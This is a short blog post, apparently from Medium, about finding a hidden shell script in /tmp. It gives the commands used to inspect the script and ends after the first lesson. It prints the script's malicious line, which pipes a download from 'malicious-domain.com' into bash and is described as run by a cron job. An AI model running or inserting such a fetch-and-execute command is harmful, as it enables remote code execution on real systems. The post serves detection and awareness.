Member-only story
How I Caught a Suspicious Shell Script Running in /tmp (And What It Taught Me)
--
Share
✍️ Full Blog Content:
Intro:
Not all attacks are loud. Some just hide in quiet corners of your filesystem — like /tmp. I once found a tiny shell script there doing something it shouldn't. No alerts were triggered. No services crashed. But it could have become a serious problem if I hadn’t checked when I did. Here’s how I found it, what it was doing, and how you can avoid making the same mistake.
What I Saw:
While checking disk usage, I noticed this:
du -sh /tmp/*
One folder in /tmp was ~80MB — more than usual. Inside, I found this:
/tmp/.cache/.xsh
When I opened it:
cat /tmp/.cache/.xsh
I saw:
#!/bin/bashcurl http://malicious-domain.com/payload.sh | bash
The script was designed to fetch a remote payload every 6 hours using a background cron job added under a non-root service user.
What I Learned:
✅ 1. Never Ignore Hidden Files in /tmp Run:
find /tmp -type f -name ".*"
Top comments (0)